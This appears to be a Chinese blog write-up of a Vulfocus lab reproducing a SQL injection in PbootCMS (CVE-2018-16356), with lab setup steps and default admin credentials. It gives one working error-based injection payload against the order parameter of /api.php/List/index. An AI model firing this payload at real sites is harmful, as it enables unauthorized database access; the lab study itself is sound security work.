[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)

简介

PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/

靶场搭建

使用在线靶场http://vulfocus.fofa.so
在这里插入图片描述
进入环境,发现需要获取授权码
在这里插入图片描述
https://www.pbootcms.com/freesn/
进入网站,输入域名获取授权码
在这里插入图片描述
然后进入网站后台
后台路径:/admin.php 用户名密码:admin:123456
在这里插入图片描述
在这里插入图片描述
输入域名授权码并提交

在这里插入图片描述
将API启用
在这里插入图片描述
再次访问网站,已经可以正常访问了
在这里插入图片描述

漏洞复现

构造payload

/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20md5(1954))),1))%20%23

在这里插入图片描述
payload中的md5(1954)被执行,证明漏洞存在。

修复

升级为最新版本

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值